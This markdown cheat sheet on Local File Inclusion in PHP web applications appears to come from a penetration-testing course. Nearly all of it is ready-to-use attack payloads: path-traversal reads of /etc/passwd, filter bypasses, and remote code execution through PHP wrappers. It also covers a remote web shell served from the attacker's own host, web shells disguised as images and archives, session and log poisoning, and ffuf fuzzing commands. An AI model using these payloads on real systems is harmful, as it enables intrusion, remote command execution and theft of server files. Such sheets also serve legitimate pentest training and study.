# Local File Inclusion
##### Basic LFI
```bash
/index.php?language=/etc/passwd # Basic LFI
/index.php?language=../../../etc/passwd # LFI with path traversal
/index.php?language=/../../../etc/passwd # LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd # LFI with approved path
```
##### LFI Bypasses
```bash
# bypass basic path traversal filter
/index.php?language=....//....//....//....//etc/passwd
# bypass filters with URL encoding
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
# bypass appended extension with path truncation
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
# Read PHP with base64 filter
/index.php?language=php://filter/read=convert.base64-encode/resource=config
```
# RCE
##### PHP Wrappers
```bash
# RCE with Data wrapper
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
# RCE with input wrapper
`curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"`
# RCE with expect wrapper
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
```
##### RFI
```bash
# Host webs shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
# Include remote PHP web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
```
##### LFI + Upload
```bash
# Create malicious image
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Create malicious zip archive 'as jpg'
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# RCE with malicious uploaded zip
/index.php?language=zip://shell.zip%23shell.php&cmd=id
# Create malicious phar 'as jpg'
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# RCE with malicious uploaded phar
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
```
##### Log Poisoning
```bash
# Read PHP session parameters
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Poison PHP session with webshell
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE through poisoned PHP session
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Poison server log
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
# RCE through poisoned PHP session
/index.php?language=/var/log/apache2/access.log&cmd=id
```
- Apache:
- Linux: `/var/log/apache2` , `/var/log/apache2/access.log`
- Windows: `C:\\xampp\\apache\\logs`
- Nginx
- Linux: `/var/log/nginx`
- Windows: `C:\\nginx\\log`
# Fuzzing
```bash
# Fuzz page parameters
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value'
# Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ'
# Fuzz webroot path
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php'
# Fuzz server configurations
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ'
```
##### Wordlists
```bash
# fuzzing parameters
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
# LFI wordlists
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
# Server Webroot
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-windows.txt
# Server configurations wordlist for linux
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
# Server configurations wordlist for windows
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
```